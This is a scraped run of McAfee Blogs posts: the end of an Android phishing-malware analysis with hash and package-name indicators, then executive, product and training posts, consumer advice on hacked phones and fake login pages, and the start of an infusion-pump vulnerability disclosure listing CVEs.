The cybercriminals behind these two pieces of malware designed a simple but interesting string obfuscation technique. All strings are decoded by calling different classes and each class has a completely different table value

Figure 12. Calling the de-obfuscation method with different parameters 

Figure 13. String de-obfuscation method 

Figure 14. String de-obfuscation table 

The algorithm is a simple substitution cipher. For example, 35 is replaced with ‘h’ and 80 is replaced with ‘t’ to obfuscate the string. 

Appendix – Technical Data and IOCs 

Hash  Package name 
1e8fba3c530c3cd7d72e208e25fbf704ad7699c0a6728ab1b290c645995ddd56  direct.uujgiq.imobile 
7f7b0555563e08e0763fe52f1790c86033dab8004aa540903782957d0116b87f  ferrero.uabxzraglk.imobile 


120a51611a02d1d8bd404bb426e07959ef79e808f1a55ce5bff33f04de1784ac  erni.zbvbqlk.imobile 


ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 


da900a00150fcd608a09dab8a8ccdcf33e9efc089269f9e0e6b3daadb9126231  foundation.aznohomqlq.imobile 
795425dfc701463f1b55da0fa4e7c9bb714f99fecf7b7cdb6f91303e50d1efc0  fresenius.bowqpd.immobile 
b41c9f27c49386e61d87e7fc429b930f5e01038d17ff3840d7a3598292c935d7  cisco.uemoveqlg.immobile 
8de8c8c95fecd0b1d7b1f352cbaf839cba1c3b847997c804dfa2d5e3c0c87dfe  komatsu.mjeqls.imobile 
ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 
326d81ba7a715a57ba7aa2398824b420fff84cda85c0dd143462300af4e0a37a  alstom.zjeubopqf.certificate 
154cfd0dbb7eb2a4f4e5193849d314fa70dcc3caebfb9ab11b4ee26e98cb08f7  alstom.zjeubopqf.certificate 
c59ecd344729dac99d9402609e248c80e10d39c4d4d712edef0df9ee460fbd7b  alstom.zjeubopqf.certificate 
16284cad1b5a36e2d2ea9f67f5c772af01b64d785f181fd31d2e2bec2d98ce98  alstom.zjeubopqf.certificate 
98fc0d5f914ae47b61bc7b54986295d86b502a9264d7f74739ca452fac65a179  alstom.zjeubopqf.certificate 




The post Phishing Android Malware Targets Taxpayers in India appeared first on McAfee Blogs.

Executive Spotlight: Q&A with EMEA Senior Vice President, Adam Philpott Thu, 02 Sep 2021 15:00:14 +0000

Welcome back to our executive blog series, where we’re sitting down with some of the pivotal players behind McAfee Enterprise...

The post Executive Spotlight: Q&A with EMEA Senior Vice President, Adam Philpott appeared first on McAfee Blogs.


Welcome back to our executive blog series, where we’re sitting down with some of the pivotal players behind McAfee Enterprise to hear their takes on today’s security trends, challenges, and opportunities for enterprises across the globe.

Q: Do you have a role model? If so, who is it?

Well, there are work and there are more personal role models. At work, I have several past and present role models I’ve met across my career that share the same traits. They’re typically great leaders who lead authentically and with a strong sense of purpose and values. For these, I often think when facing a challenge, “What would he or she do?”

Personally, I have many people who have inspired me. A current, topical favorite is Gareth Southgate – manager of the England national football team. He’s not only achieved great success in getting the team to their first final in over 50 years but has challenged the status quo by focusing on young talent and has played a pivotal role as a visible leader in support of diversity.

Q: What’s the most important thing happening in your field at the moment? 

The pandemic, coupled with the ongoing digitization of society, are probably the two most dominant topics in the cyber domain. Ransomware and cyber threats continue to rise in profile, as does cyber security and information assurance in the macro, geo-political sphere. Our purpose has never been greater as leaders in this field.

Q: Will zero trust be a requirement for agencies?

Yes. Organizations deliver outcomes through partnerships, both at a human and systems level. Implementing mechanisms to ensure trust is increasingly important as these partnerships increasingly digitize in operation. Thinking of zero trust as an architecture and framework matters. Many suppliers articulate zero trust as a feature. It is not. As a true partner, it’s important to consider its role more broadly, to not trust and always verify, not just a virtual choke point (remember, there is no perimeter), but throughout the data journey.

Q: What was your mindset to build your team and establish the right culture to drive success for the new company and continue to strive for new goals in the future?

In building a team with the culture to drive growth, the most fundamental attributes I seek in every team member is attitude and energy. Those are the power and velocity needed as a foundation. It’s amazing what people can achieve, and how they find ways to do so, with those fundamental ingredients.

When you combine a group of those people with a common goal and assign each a clear role to play, you end up with a phenomenal team. Rather than offering either no parameters, or parameters that are too narrow, you must empower them with a framework in which they can innovate and find ways to win. This is critical – giving them the scope to use their talent for a positive outcome. Listen to them. Hiring great people who push boundaries brings a lot of intellect and creativity. It’s a waste of intelligence if you don’t take the time to learn from them to continuously improve the business.


The post Executive Spotlight: Q&A with EMEA Senior Vice President, Adam Philpott appeared first on McAfee Blogs.

SASE, Cloud Threats and MITRE Tue, 31 Aug 2021 14:15:49 +0000

As you know, McAfee Enterprise’s MVISION Unified Cloud Edge (UCE) was the first of all the SASE vendors to implement...

The post SASE, Cloud Threats and MITRE appeared first on McAfee Blogs.


As you know, McAfee Enterprise’s MVISION Unified Cloud Edge (UCE) was the first of all the SASE vendors to implement the MITRE ATT&CK Framework for Cloud last year. An important aspect of Gartner’s SASE Framework is the ability for effective Threat Protection and Resolution in the Cloud. MVISION UCE takes this to the next level – the product takes a multi-layered approach to cloud threat investigation that can speed your time to detect adversary activity in your cloud services, identify gaps, and implement targeted changes to your policy and configuration.

As a quick refresher, the MITRE Att&CK Matrix represents the relationship between attacker Tactics and Techniques:

  • Tactics. A tactic describes the objective, or why the adversaries are performing the attack. In the ATT&CK Matrix, the table header represents tactics.
  • Technique. A technique describes how adversaries achieve their tactical objectives. For example, what are the various technical ways performed by attackers to achieve the goal? In the ATT&CK Matrix, the table cell represents techniques.

This Dashboard is available within the MVISION Cloud console by accessing the Dashboards > MITRE Dashboard link

Ever since the launch of this truly differentiated product offering, we have seen a tremendous amount of interest and adoption of this feature within our existing customers. Over the past few months, we have continued to make significant enhancements as part of our MITRE Dashboard.

In this post, I shall summarize some of the significant highlights that we have introduced in the past few releases:

Executive Summary Section

The Executive Summary displays an at-a-glance view of the current count of Threats, Anomalies, Incidents, types of incidents, and Detected Techniques with severity.

Flexible Filters

To suit the needs of the different teams that would be using the MVISION Dashboard, we now have the ability to filter the MITRE Dashboard by using a variety of facets:

  • Service Name. The name of the cloud service.
  • Threat Type. The name of the threat type.
  • Status. The MITRE Threat statuses available are:
    • Executed Threat. Threats that caused risk to your cloud service security.
    • Potential Threat. Threats that have the potential to cause risk to your cloud service security. It is recommended to look into the Potential Threats to reduce the impending risk.
  • Top 20 Users. Top 20 users who are impacted by the attacks.

Detected Techniques – Risk and Drilldown

When an incident is detected for a technique in MVISION Cloud, a severity is computed. The detected techniques are categorized based on the severity of the incidents. Each detected technique is interactive and leads to more detailed explanations.

To view the details of the detected techniques:

  1. Click any technique on the ATT&CK Matrix table to view the Technique Cloud Card. For example, you can click one of the techniques under the Initial Access category such as Trusted Relationship to learn how an attacker gained access to an organization’s third-party partners’ account and shows the details of compromised Connected Apps.
  2. Next, click the Connected Apps Mini Card to view an extended cloud card that displays the restricted details of Connected Apps.
  3. Then click the link to the specific restricted Connected App to see an extended view of the compromised Connected Apps incident.
  4. Info severity details allow you to investigate and apply a remediation action. As a remediation action, select and assign the Owner and Status from the menu.

With McAfee Enterprise, threat investigation isn’t just for one environment – it is for all of your environments, from cloud to endpoint to your analytics platforms. With MVISION CloudMVISION EDR, and MVISION Insights, your enterprise has an extended detection and response (XDR) platform for the heterogenous attacks you face today.


MITRE ATT&CK® as a Framework for Cloud Threat Investigation

Want to learn more about how you can leverage MITRE ATT&CK to extend your detection and response capabilities to the cloud?

Download Now

The post SASE, Cloud Threats and MITRE appeared first on McAfee Blogs.

Access Granted: How the DoD Can Stay Cyber-Resilient Mon, 30 Aug 2021 15:00:05 +0000

Now more than ever, it’s critical to be mission-ready for the next cyber threat. Our digital-first, post-pandemic world is shifting...

The post Access Granted: How the DoD Can Stay Cyber-Resilient appeared first on McAfee Blogs.


Now more than ever, it’s critical to be mission-ready for the next cyber threat. Our digital-first, post-pandemic world is shifting back to a new normal. But the threats are still here.


And according to many reports, the threats have – and are continuing to – increase. McAfee Enterprise’s Advanced Threat Research recently published a report highlighting some of the biggest cyber stories dominating the year thus far, including recent ransomware attacks. While the topic itself is not new, there is no question that the threat is now truly mainstream. In fact, the June report provides a deep dive into the DarkSide ransomware, which resulted in an agenda item in talks between U.S. President Biden and Russian President Putin.

Rising Up

So how does the DoD approach modern-day threats like this? McAfee Enterprise’s online cyber training program is a great place to start. I’m proud to say the program is complimentary for our DoD partners and provides anywhere from 1-6 Continuing Professional Education (CPE) hours per course. You can login anywhere in the world to access the various trainings. Plus, the digital course are valid for 30 days from your registration date, so you can start and stop at any time. Not surprisingly, the tech industry is seeing a greater acceptance and return on investment from online training programs. Within the DoD for example, the Airforce recently launched Digital University. Airmen are elevating their digital literacy skills with up to 12,000 courses to better serve our country, while discovering new career paths in the process. Everything from leadership and public speaking to cloud computing and cybersecurity are covered, proving this platform may be the future of IT training.

Access Granted

I know the cyber industry that I joined 20+ years ago isn’t the same as it is today. And without access to trainings and CPE courses, my skill set would not be as strong. But if your day is anything like mine, finding time to squeeze in continuing education courses is a challenge. However, after hearing feedback from a long-time DoD partner, I know we’re on to something good. Success stories like these remind me of the importance of staying cyber-resilient in the field.

Don’t forget to reach out to your McAfee Enterprise Account Executive for your unique DoD voucher code!


The post Access Granted: How the DoD Can Stay Cyber-Resilient appeared first on McAfee Blogs.

Help! I Think My Phone’s Been Hacked Fri, 27 Aug 2021 23:15:35 +0000

“My phone’s been hacked!” Words you probably don’t want to hear or say. Ever.  Your phone gets to be like...

The post Help! I Think My Phone’s Been Hacked appeared first on McAfee Blogs.


“My phone’s been hacked!” Words you probably don’t want to hear or say. Ever. 

Your phone gets to be like an old friend after a while. You have things laid out the way you like, your favorite apps are at the ready, and you have the perfect home screen and wallpaper all loaded up. So, if you unlock your phone one day and notice that something is a little … off, you’ll know pretty quickly. And it could be a sign that your phone may be hacked.  

How to know if your phone is hacked? 

It’s often pretty easy to tell when a piece of your tech isn’t working quite right. The performance is off, things crash, and so on. While there are several cases where there’s a legitimate technical issue behind that, it could also be the sign of a hacked device.  

Many hacks and attacks involve the installation of malware on the device, which eats up system resources, creates conflicts with other apps, and uses your data or internet connection to pass along your personal information—all of which can make your smartphone feel a little off. 

A few examples follow. Note that these may be signs of a hacked phone, yet not always. 

Performance hits and battery drain 

A suddenly sluggish phone or one that simply can’t hold a charge anymore are often attributed to phones that are getting a little old (these things happen). Yet, those same behaviors can also be signs of a compromised phone. For example, malicious bitcoin miners can run in the background and cause all types of performance issues because they eat up battery life and take up resources that your phone could otherwise normally use. In a way, it’s like having a second person using your phone at the same time you are. 

Your phone feels like it’s running hot 

Similar to the performance issues mentioned above, malware or mining apps running in the background can burn extra computing power, battery life, and data. Aside from a performance hit, they can cause your phone to physically run hot or even overheat. So if your phone feels like it’s been sitting in the sun, this could be a sign that malware is present. 

Popups suddenly appear on your phone 

If you’re seeing more popup ads than usual or seeing them for the first time, it could be a sign that your phone has been hit with adware—a type of malicious app that hackers use to generate revenue by distributing ads without the consent of the user. Furthermore, those ads may be malicious in nature as well (which is a good reminder to never click on them). Such ads may lead to bogus products and services or pages designed to steal personal information. All in all, malicious adware is what hackers prop up to make money off unsuspecting people. 

Mysterious apps, calls, or texts appear 

A potential telltale sign that your phone has been hacked is the appearance of new apps that you didn’t download, along with spikes in data usage that you can’t account for. Likewise, if you see calls in your phone bill that you didn’t make, that’s a warning as well. 

You run out of data or see unknown charges pop up 

Big red flag here. Like seeing an unknown charge or payment in your bank statement, this is a possible sign that a hacker has hijacked your phone and is using it to transfer data, make purchases, send messages, or make calls via your phone.  

What to do if your phone is hacked? 

  • Install and run security software on your smartphone if you haven’t already. From there, delete any apps you didn’t download, delete risky texts, and then run your mobile security software again. 
  • If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone. 
  • Lastly, check your accounts and your credit card statements to see if any unauthorized purchases have been made. If so, you can go through the process of freezing those accounts and getting new cards and credentials issued. Further, update your passwords for your accounts with a password that is strong and unique to prevent further theft.  

Five tips to keep your phone from getting hacked  

To help keep your phone from getting hacked in the first place, there are a few relatively easy steps you can take. Inside of a few minutes, you can find yourself much safer than you were before.  

1. Use comprehensive security software on your phone. Over the years, we’ve gotten into the good habit of using this on our computers and laptops. Our phones? Not so much. Installing security software on your smartphone gives you the first line of defense against attacks, plus several of the additional security features mentioned below. 

2. Stay safer on the go with a VPN. One way that crooks can hack their way into your phone is via public Wi-Fi, such as at airports, hotels, and even libraries. These networks are public, meaning that your activities are exposed to others on the network—your banking, your password usage, all of it. One way to make a public network private is with a VPN, which can keep you and all you do protected from others on that Wi-Fi hotspot.  

3. Use a password manager. Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one. 

4. Avoid public charging stations. Charging up at a public station seems so simple and safe. However, some hackers have been known to “juice jack” by installing malware into the charging station. While you “juice up,” they “jack” your passwords and personal info. So what to do about power on the road? You can look into a portable power pack that you can charge up ahead of time or run on AA batteries. They’re pretty inexpensive and can prevent malware from a public charging station.  

5. Keep your eyes on your phone. Preventing the actual theft of your phone is important too, as some hacks happen simply because a phone falls into the wrong hands. This is a good case for password or PIN protecting your phone, as well as turning on device tracking so that you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices and Google offers up a guide for Android users as well.  

Phone acting funny? Follow up. 

A phone that’s acting a little funny may indicate a run-of-the-mill tech issue, yet it could also be a tell-tale sign of a hack. At a minimum, following up on your gut instinct that something isn’t quite right can take care of a nagging tech issue. But in the event of a possible hack, it can save you the far greater headache of unauthorized charges and purchases, and even identity theft. If you spot a problem, it absolutely pays to take a closer look. Follow up with tech support for help, whether that’s through your device manufacturer, retailer, or your antivirus providers. They’ll help pinpoint the issue and get you on your way. 

The post Help! I Think My Phone’s Been Hacked appeared first on McAfee Blogs.

How to Spot Fake Login Pages Fri, 27 Aug 2021 00:23:07 +0000

Have you ever come across a website that just didn’t look quite right? Perhaps the company logo looked slightly misshapen, or the...

The post How to Spot Fake Login Pages  appeared first on McAfee Blogs.


Have you ever come across a website that just didn’t look quite right? Perhaps the company logo looked slightly misshapen, or the font seemed off-brand. Odds are, you landed on a phony version of a legitimate corporation’s website—a tried and true tactic relied on by many cybercriminals.  

Fake Login Pages Explained  

A fake login page is essentially a knock-off of a real login page used to trick people into entering their login credentials, which hackers can later use to break into online accounts. These websites mirror legitimate pages by using company logos, fonts, formatting, and overall templates. Depending on the attention to detail put in by the hackers behind the imposter website, it can be nearly impossible to distinguish from the real thing. Consequentially, fake login pages can be highly effective in their end goal: credential theft.  

How do these pages get in front of a consumer in the first place? Typically, scammers will target unsuspecting recipients with phishing emails spoofing a trusted brand. These emails may state that the user needs to reset their password or entice them with a deal that sounds too good to be true. If the consumer clicks on the link in the email, they will be directed to the fake login page and asked to enter their username and password. Once they submit their information, cybercriminals can use the consumer’s data to conduct credential stuffing attacks and hack their online profiles. This could lead to credit card fraud, data extraction, wire transfers, identity theft, and more. 

How Fake Login Pages Are Affecting Canadians 

Scammers have recently targeted Canadians with attacks leveraging fake login pages to harvest personal data. For example, criminals preyed on employees who were expecting COVID-19 relief grants in the form of the CERB (Canada Emergency Response Benefit). These funds were sent via an electronic transfer from Interac, a legitimate Canadian interbank network. However, a phishing campaign spoofing Interac’s e-transfer service circulated emails claiming that the Canada Revenue Agency (CRA) made a CERB deposit of $1,957.50 CAD.  

These emails directed recipients to a fake CRA login page, which then redirected to a phony Interac e-transfer site where users were asked to select their personal bank. From there, the recipient was asked to enter their username, card number, password, security questions and answers for their online banking profile, and other personally identifiable information—providing all the information a criminal would need to hack into the user’s bank account.  

Why Fake Login Pages are Effective  

If you Google “fake login pages,” you will quickly find countless guides on how to create fake websites in seconds. Ethical concerns aside, this demonstrates just how common vector spoofed websites are for cyberattacks. While it has been easier to distinguish between real and fake login pages in the past, criminals are constantly updating their techniques to be more sophisticated, therefore making it more difficult for consumers to recognize their fraudulent schemes.  

One reason why fake login pages are so effective is due to inattentional blindness, or failure to notice something that is completely visible because of a lack of attention. One of the most famous studies on inattentional blindness is the “invisible gorilla test.” In this study, participants watched a video of people dressed in black and white shirts passing basketballs. Participants were asked to count the number of times the team in white passed the ball: 

Because participants were intently focused on counting the number of times the players in white passed the ball, more than 50% failed to notice the person in the gorilla costume walking through the game. If this is the first time you’ve seen this video, it’s likely that you didn’t notice the gorilla, the curtain changing color from red to gold, or the player in black leaving the game. Similarly, if you come across a well-forged login page and aren’t actively looking for signs of fraud, you could inherently miss a cybercriminal’s “invisible gorilla.” That’s why it’s crucial for even those with phishing training to practice caution when they come across a website asking them to take action or enter personal details.  

How to Steer Clear of Fake Login Pages  

The most important defense against steering clear of fake login pages is knowing how to recognize them. Follow these tips to help you decipher between a legitimate and a fake website:  

1. Don’t fall for phishing  

Most fake login pages are circulated vis phishing messages. If you receive a suspicious message that asks for personal details, there are a few ways to determine if it was sent by a phisher aiming to steal your identity. Phishers often send messages with a tone of urgency, and they try to inspire extreme emotions such as excitement or fear. If an unsolicited email urges you to “act fast!” slow down and evaluate the situation. 

2. Look for misspellings or grammatical errors  

Oftentimes, hackers will use a URL for their spoofed website that is just one character off from the legitimate site, such as using “” versus “” Before clicking on any website from an email asking you to act, hover over the link with your cursor. This will allow you to preview the URL and identify any suspicious misspellings or grammatical errors before navigating to a potentially dangerous website. 

3. Ensure the website is secured with HTTPS 

HTTPS, or Hypertext Transfer Protocol Secure, is a protocol that encrypts your interaction with a website. Typically, websites that begin with HTTPS and feature a padlock in the top left corner are considered safer. However, cybercriminals have more recently developed malware toolkits that leverage HTTPS to hide malware from detection by various security defenses. If the website is secured with HTTPS, ensure that this isn’t the only way you’re analyzing the page for online safety.  

4. Enable multi-factor authentication 

Multi-factor authentication requires that users confirm a collection of things to verify their identity—usually something they have, and a factor unique to their physical being—such as a retina or fingerprint scan. This can prevent a cybercriminal from using credential-stuffing tactics (where they will use email and password combinations to hack into online profiles) to access your network or account if your login details were ever exposed during a data breach.  

5. Sign up for an identity theft alert service 

An identity theft alert service warns you about suspicious activity surrounding your personal information, allowing you to jump to action before irreparable damage is done. McAfee Total Protection not only keeps your devices safe from viruses but gives you the added peace of mind that your identity is secure, as well.  

The post How to Spot Fake Login Pages  appeared first on McAfee Blogs.

McAfee Enterprise ATR Uncovers Vulnerabilities in Globally Used B. Braun Infusion Pump Tue, 24 Aug 2021 13:00:53 +0000

Overview As part of our continued goal to provide safer products for enterprises and consumers, we at McAfee Advanced Threat...

The post McAfee Enterprise ATR Uncovers Vulnerabilities in Globally Used B. Braun Infusion Pump appeared first on McAfee Blogs.



As part of our continued goal to provide safer products for enterprises and consumers, we at McAfee Advanced Threat Research (ATR) recently investigated the B. Braun Infusomat Space Large Volume Pump along with the B. Braun SpaceStation, which are designed for use in both adult and pediatric medical facilities. This research was done with support from Culinda – a trusted leader in the medical cyber-security space. Though this partnership, our research led us to discover five previously unreported vulnerabilities in the medical system which include:

  1. CVE-2021-33886 – Use of Externally-Controlled Format String (CVSS 7.7)
  2. CVE-2021-33885 – Insufficient Verification of Data Authenticity (CVSS 9.7)
  3. CVE-2021-33882 – Missing Authentication for Critical Function (CVSS 8.2)